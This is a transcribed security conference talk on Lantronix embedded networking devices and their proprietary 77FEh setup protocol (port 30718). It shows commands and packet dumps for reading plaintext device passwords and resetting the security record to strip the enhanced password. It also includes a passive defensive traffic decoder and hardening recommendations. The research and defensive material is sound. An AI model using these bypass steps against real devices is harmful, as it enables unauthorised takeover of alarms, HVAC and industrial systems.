Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Presentation presented at Confidence 2014: Getting access to Lantronix devices: exploring treasures of 77FEh.


Slide 1
Mos Eisley Lab
Confidence 2014
Exploring treasures of 77FEh
Getting access to Lantronix devices
Vlatko Kosturjak, Diverto
@k0st

Slide 2: Who are you!?!!??
● Security Jedi at Diverto
  – Bringing balance to the force
● Experience
  – Offensive (Penetration tester)
  – Defensive (Developer/System Administrator/...)
  – Have code in: Nmap, Metasploit, OpenVAS, …
  – Author of free software: https://github.com/kost/
● If you trust in certificates
  – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...

Slide 3: Agenda
● Introduction - Lantronix
● Physical access
● WTF is 77FEh?
● Vulnerabilities & Exploitation
● Recommendations
● Questions and answers
45 minutes

Slide 4: Lantronix
Source: www.lantronix.com

Slide 5: You can find them as integral part of
● Alarms
● HVACs
● Pool monitoring systems
● Sprinkler controllers
● Hacked vacuum cleaners - Roombas
● Embedded systems
● Industrial systems
Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
Slide 6: What are they actually running?
● OS
  – CoBos (mostly)
  – Evolution OS/Linux
  – ThreadX
  – Linux
● Support
  – 1 or more serial ports
  – Modbus (few models)
  – 10/100 Ethernet
Slide 7: Physical access
● Like usual
  – Game over
● Serial access
  – No password by design
● Requirements
  – Standard TTL cable
  – BusPirate
  – ...

Slide 8: Connecting to serial port...
● 9600 bps 8/N/1
● Flow control: None
Slide 9: Most frequent services available – TCP/IP
● Web (tcp/80) – simple web server, serving an applet JAR which talks to port 30718
● Telnet (tcp/9999) – telnet administration interface
● 77FEh (tcp-udp/30718) – what is this?
● SNMP (udp/161) – mostly information disclosures
Slide 10: Device Discovery
● Ask :)
● Look if you have physical access
● Passive
● Active/Scanning
  – Standard port scanning is fine with conservative timing
  – Broadcast UDP to specific Lantronix ports (30718)
● Beware
  – Version scanning (-sV) or running vulnerability scanners may misconfigure the device

Slide 11: Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :

Slide 12: So, WTF is 77FEh finally?
● 0x77FE = 30718 (10)
● TCP/UDP protocol for device setup
  – Proprietary protocol
  – Used by DeviceInstaller (proprietary software from Lantronix)
● Designed for
  – Setup of device
  – Administration of device
  – Getting device info
  – Insecurity (sorry, had to write it, you'll see later ;) )

Slide 13: Sample 77FEh communication
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
Annotations on the dump: query setup request (4), query setup response (4), MAC address of the device (6), device type

Slide 14: Interesting request #1
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f8 ....
[v] Received 124 bytes:
0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST
0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........
0x00000020 (00032) cc070000 00000000 00000000 00000000 ................
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 ............
Annotations on the dump: query setup (4), IPv4 (4), simple password in plaintext (4)
Slide 15: Previous work
● Metasploit
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
● Tools
  – Simple C program by jgor
    ● https://github.com/jgor/lantronix-telnet-pw
Slide 16: But...
● Simple password is not set
● Device still asks for password
● Further digging
  – Enhanced password in place
  – You cannot get/reset the enhanced password easily
  – Length is bigger (4->16)
  – Challenge!!!

Slide 17: Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type            | Simple Password | Enhanced Password
Length                  | 4               | 16
Visible in query setup  | yes             | no

Slide 18
Source: Mohdafri.com

Slide 19: Interesting request #2
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:
0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........
0x00000020 (00032)
Annotations on the dump: query ext version request (4), simple password in plaintext (4), version (6)

Slide 20: Interesting request #3
● Request to query configuration
  – 000000eX
● Response to query configuration
  – 000000bX + followed by 126 bytes of setup
● X = number of setup record (0 – F):
  – 0 basic setup record
    ● Simple password, IP...
  – 1 security record
    ● Enhanced password, AES key, SNMP...
  – 2 specific products / situations
  – 3 OEMs
  – ...
Overlay: Wrong! Request for security record 1 provides just zero bytes! HALF

Slide 21: Interesting request #4
● Request to change configuration
  – 000000cX + followed by 126 bytes of setup
● Response to change configuration
  – 000000bX
● X = number of setup record (0 – F):
  – 0 basic setup record
  – 1 security record
  – 2 specific products / situations
  – 3 OEMs

Slide 22: Setting setup record 1 for security
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip>
[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
0x00000080 (00128) 0000 ..
[v] Received 4 bytes:
0x00000000 (00000) 000000b1 ....
Setting setup record 1 was successful
Annotations on the dump: set setup record 1 (security) request, SNMP community string (13), enhanced password (16)
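The dumps on slides 13, 14, 19, 20, 21 and 22 give enough of the 77FEh message layout to recognise this traffic passively, which is what a network defender wants: which hosts are talking 77FEh, which of those messages merely read device info, and which ones write setup records (the 000000cX family, with record 1 being the security record). The decoder below is an added example for this page, not code from the talk or from lantronix-witchcraft; the opcode meanings and field offsets are read off the slides' dumps, and the sample capture (addresses, ports) is constructed from those same dumps. It deliberately reports only that the simple-password field is non-empty, never its value.

```python
"""Passive decoder for Lantronix 77FEh (tcp/udp 30718) traffic.

Added example for this page; it is not part of the talk or of lantronix-witchcraft.
Opcode meanings and field offsets are taken from the dumps on slides 13, 14, 19,
20, 21 and 22; the capture at the bottom is constructed from those same dumps.
"""
from dataclasses import dataclass, field

PORT_77FE = 0x77FE  # 30718

# Fixed opcodes seen on slides 13, 14 and 19 (request -> response pairs).
FIXED_OPCODES = {
    0xF6: ("request", "query setup (MAC address)", "info"),
    0xF7: ("response", "query setup response", "info"),
    0xF8: ("request", "query full setup (reply carries the simple password)", "high"),
    0xF9: ("response", "setup record 0 incl. plaintext simple password", "high"),
    0xF4: ("request", "query extended version", "info"),
    0xF5: ("response", "extended version response", "info"),
}


@dataclass
class Finding:
    kind: str          # "request", "response" or "unknown"
    opcode: int
    description: str
    severity: str      # "info", "medium" or "high"
    details: dict = field(default_factory=dict)


def decode_77fe(payload: bytes) -> Finding:
    """Classify one 77FEh message by its 4-byte opcode and extract non-secret fields."""
    if len(payload) < 4 or payload[:3] != b"\x00\x00\x00":
        return Finding("unknown", -1, "not a 77FEh message", "info")
    op = payload[3]
    group, record = op >> 4, op & 0x0F
    if group == 0xE:  # 000000eX: read setup record X (slide 20)
        return Finding("request", op, f"query setup record {record}", "medium",
                       {"record": record})
    if group == 0xC:  # 000000cX + 126 bytes: overwrite setup record X (slides 21/22)
        what = {0: "basic setup", 1: "security: enhanced password, AES key, SNMP"}
        desc = f"change setup record {record} ({what.get(record, 'product/OEM record')})"
        return Finding("request", op, desc, "high",
                       {"record": record, "setup_bytes": len(payload) - 4})
    if group == 0xB:  # 000000bX: device's reply to a setup-record operation
        return Finding("response", op, f"setup record {record} response", "info",
                       {"record": record})
    if op not in FIXED_OPCODES:
        return Finding("unknown", op, "unknown 77FEh opcode", "medium")
    kind, desc, sev = FIXED_OPCODES[op]
    details = {}
    if op == 0xF7 and len(payload) >= 10:
        details["mac"] = payload[-6:].hex(":")  # MAC is the last 6 bytes (slide 13)
    elif op == 0xF9 and len(payload) >= 16:
        details["ipv4"] = ".".join(str(b) for b in payload[4:8])
        # bytes 12..15 hold the simple password (slide 14): log presence, never the value
        details["simple_password_present"] = any(payload[12:16])
    elif op == 0xF5 and len(payload) > 16:
        details["version"] = payload[16:].split(b"\x00", 1)[0].decode("ascii", "replace")
    return Finding(kind, op, desc, sev, details)


def scan_capture(packets):
    """packets: (src, dst, proto, sport, dport, hex_payload); returns findings for port 30718."""
    findings = []
    for src, dst, proto, sport, dport, hex_payload in packets:
        if PORT_77FE not in (sport, dport):
            continue
        findings.append((src, dst, proto, decode_77fe(bytes.fromhex(hex_payload))))
    return findings


def high_severity(packets):
    """(src, dst, description) for every high-severity 77FEh message in the capture."""
    return [(s, d, f.description) for s, d, _, f in scan_capture(packets)
            if f.severity == "high"]


# Constructed capture: payload bytes copied from the slides, hosts and ports invented.
F9_RESPONSE = ("000000f9 c0a809c9 00000000 54455354 c0a80905 4c020000 141e141e 0a0a0a0a "
               "cc070000 00000000 00000000 00000000" + " 00000000" * 16
               + " 00000000 00000000 00000000")
F5_RESPONSE = "000000f5 09040000 00000000 54455354 352e382e 382e3300 00000000 00000000"
C1_REQUEST = ("000000c1" + " 00000000" * 7 + " 00000000 00007075 626c6963 00000000"
              + " 00000000" * 20 + " 0000")
DEV, MGMT = "192.168.9.201", "10.0.0.5"
SAMPLE_CAPTURE = [
    (MGMT, DEV, "udp", 40001, 30718, "000000f6"),
    (DEV, MGMT, "udp", 30718, 40001,
     "000000f7 00108005 58324400 df0e0000 62a7d944 00000000 00204a91 84fb"),
    (MGMT, DEV, "tcp", 40002, 30718, "000000f8"),
    (DEV, MGMT, "tcp", 30718, 40002, F9_RESPONSE),
    (MGMT, DEV, "tcp", 40003, 30718, "000000f4"),
    (DEV, MGMT, "tcp", 30718, 40003, F5_RESPONSE),
    (MGMT, DEV, "tcp", 40004, 30718, C1_REQUEST),
    (DEV, MGMT, "tcp", 30718, 40004, "000000b1"),
    (MGMT, DEV, "tcp", 40005, 443, "deadbeef"),  # unrelated traffic, ignored
]

if __name__ == "__main__":
    for src, dst, proto, f in scan_capture(SAMPLE_CAPTURE):
        print(f"{src} -> {dst} {proto} [{f.severity}] {f.description} {f.details}")
```

Run stand-alone it prints one line per 77FEh message; on the constructed capture the three high-severity lines are the full-setup query, its password-bearing reply, and the write to security record 1 that slide 22 shows, which is exactly the sequence a defender would want alerted on. The per-record severities and the unknown-opcode fallback are choices of this example, not something the slides specify.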
Slide 23: Enhanced password gone
no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode

Slide 24: Authentication Algorithm Guess
Flowchart, reconstructed from the slide's node labels:
Authenticate
→ Enhanced password set → Ask for enhanced → Password OK → Display setup menu
→ Enhanced not set, Simple password set → Ask for simple → Password OK → Display setup menu
→ Enhanced not set, Simple not set → Display setup menu

Slide 25: New tool: lantronix-witchcraft
● 77FEh protocol implementation
● 77FEh security related utility
● All the tricks mentioned implemented
● Free software: GPL2
● Requirement: Perl
● Available at
  – https://github.com/kost/lantronix-witchcraft
Slide 26: Basic usage:
● Display MAC address:
  – ./lantronix-witchcraft.pl -Q <ip>
● Display simple password (up to 4 characters)
  – ./lantronix-witchcraft.pl -P <ip>
● Reset security record (together with enhanced password)
  – ./lantronix-witchcraft.pl -E <ip>
● Reset security record without AES (with enhanced password)
  – ./lantronix-witchcraft.pl -S <ip>
● Dump setup records
  – ./lantronix-witchcraft.pl -G -D <ip>

Slide 27: Brave enough?
● One command to rule them all
● Display MAC address and simple password, dump setup records, reset security records together with enhanced password:
  – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>

Slide 28: Still wondering why automatic scanning is bad for Lantronix?
● Dump of setup record:
00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
The stored bytes decode to "NSPlayer/9.0.0.2980; {0000AA00-0A00-0...", a media-player user-agent string of the kind that version-scanning probes send: the scanner's probe ended up written into the device's setup record.
Slide 29: Correct way
● Ask
  – Someone responsible if they could have something like that
● Send broadcast query packet to 77FEh
● Identify ports 30718 open (TCP or UDP)
● Dump setup records
● Play ;)
● Check if it is still working...
  – If yes, perfect
  – If not: huh, but you should restore setup records somehow ;)

Slide 30: It's not about Lantronix...
● ...they warned the vendors about it in their documentation
Source: Lantronix documentation

Slide 31: Disclosure Problem
● It's more about vendors who implement Lantronix in their devices
● Whom to report?
  – Lantronix – I guess they know their protocol ;)
  – OEMs – hard to find all their customers ;)
● Awareness
  – Conference
  – Tools

Slide 32: But maybe it could be done...
● Add white list
● Encryption/SSL?
Source: Lantronix documentation
Slide 33: Recommendations
● Have some other device to VPN/SSL tunnel the services
● Telnet only through VPN or other secure channel to the administration interface
● Disable 77FEh if not needed
● Filter 77FEh on network devices so that only allowed hosts can reach it
● Disable other unnecessary services (SNMP, telnet, etc.)
Slide 34: Summary
Source: duki@fb

Slide 35: Summary
● There are ways to pass beyond authentication (if 77FEh is enabled)
  – Simple passwords
  – Enhanced passwords
● Tools
  – Metasploit Lantronix modules
  – https://github.com/kost/lantronix-witchcraft
● Recommendations
  – Disable 77FEh if not needed, or filter 77FEh on network devices to allowed hosts only
  – Tunnel (VPN/SSL) all communication to these devices
● Future
  – There are things to research: a way to obtain the enhanced password or AES keys, for example

Slide 36: Acknowledgements - Thanks
● Previous work (Simple Passwords)
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● https://github.com/jgor/lantronix-telnet-pw
● Colleagues
  – Dalibor Dosegović, hardware wizard

Slide 37: Thank you!
Questions and Answers
@k0st